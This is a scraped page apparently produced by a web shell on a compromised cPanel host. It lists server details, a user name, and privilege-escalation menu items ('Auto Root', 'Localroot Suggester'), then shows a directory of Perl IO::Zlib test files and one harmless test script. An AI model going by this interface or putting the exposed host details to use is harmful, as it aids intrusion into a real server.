Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
cpan /
IO-Zlib /
t /
Delete
Unzip
Name
Size
Permission
Date
Action
basic.t
887
B
-r--r--r--
2014-12-27 11:48
external.t
3.03
KB
-r--r--r--
2014-12-27 11:48
getc.t
601
B
-r--r--r--
2014-12-27 11:48
getline.t
1.14
KB
-r--r--r--
2014-12-27 11:48
import.t
256
B
-r--r--r--
2014-12-27 11:48
large.t
553
B
-r--r--r--
2014-12-27 11:48
tied.t
604
B
-r--r--r--
2014-12-27 11:48
uncomp1.t
690
B
-r--r--r--
2014-12-27 11:48
uncomp2.t
742
B
-r--r--r--
2014-12-27 11:48
Save
Rename
use IO::Zlib; sub ok { my ($no, $ok) = @_ ; #++ $total ; #++ $totalBad unless $ok ; print "ok $no\n" if $ok ; print "not ok $no\n" unless $ok ; } $name="test.gz"; print "1..23\n"; @text = (<<EOM, <<EOM, <<EOM, <<EOM) ; this is line 1 EOM the second line EOM the line after the previous line EOM the final line EOM $text = join("", @text) ; ok(1, $file = IO::Zlib->new($name, "wb")); ok(2, $file->print($text)); ok(3, $file->close()); ok(4, $file = IO::Zlib->new($name, "rb")); ok(5, !$file->eof()); ok(6, $file->getline() eq $text[0]); ok(7, $file->getline() eq $text[1]); ok(8, $file->getline() eq $text[2]); ok(9, $file->getline() eq $text[3]); ok(10, !defined($file->getline())); ok(11, $file->eof()); ok(12, $file->close()); ok(13, $file = IO::Zlib->new($name, "rb")); ok(14, !$file->eof()); eval '$file->getlines'; ok(15, $@ =~ /^IO::Zlib::getlines: must be called in list context /); ok(16, @lines = $file->getlines()); ok(17, @lines == @text); ok(18, $lines[0] eq $text[0]); ok(19, $lines[1] eq $text[1]); ok(20, $lines[2] eq $text[2]); ok(21, $lines[3] eq $text[3]); ok(22, $file->eof()); ok(23, $file->close()); unlink($name);